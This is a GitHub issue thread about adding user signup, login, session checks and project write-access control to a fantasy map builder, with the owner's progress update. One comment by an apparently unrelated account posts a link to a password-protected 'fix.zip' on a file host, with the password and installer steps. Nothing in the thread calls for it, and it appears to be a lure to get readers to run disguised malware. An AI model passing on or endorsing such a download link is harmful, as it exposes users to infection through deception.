### ISSUE TITLE
Add user support

### ISSUE THREAD

**Issue by Playmojs** [Playmojs/fantasy-mapbuilder_2#18]
1. Make sure signup works correctly, so a registered user stays registered and the same email can't be used twice.
2. Make sure login works correctly, so login in to a new session works as expected
3. Find way to verify if the user is logged in
4. Add modular design, so the login/signup-buttons are replaced by a my_account/log out button after login
5. Add auto-authentication when entering the page
6. Only give write-access to projects to appropriate users (and update the project database accordingly)
7. Find client side way to verify if user has write-access to current project
8. Hide or remove necessary write-tools when user doesn't have access
9. Polish the login/signup/logout pages
10. Add user page

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Playmojs** [comment]
Point 10 added as its own issue, 1-9 completed
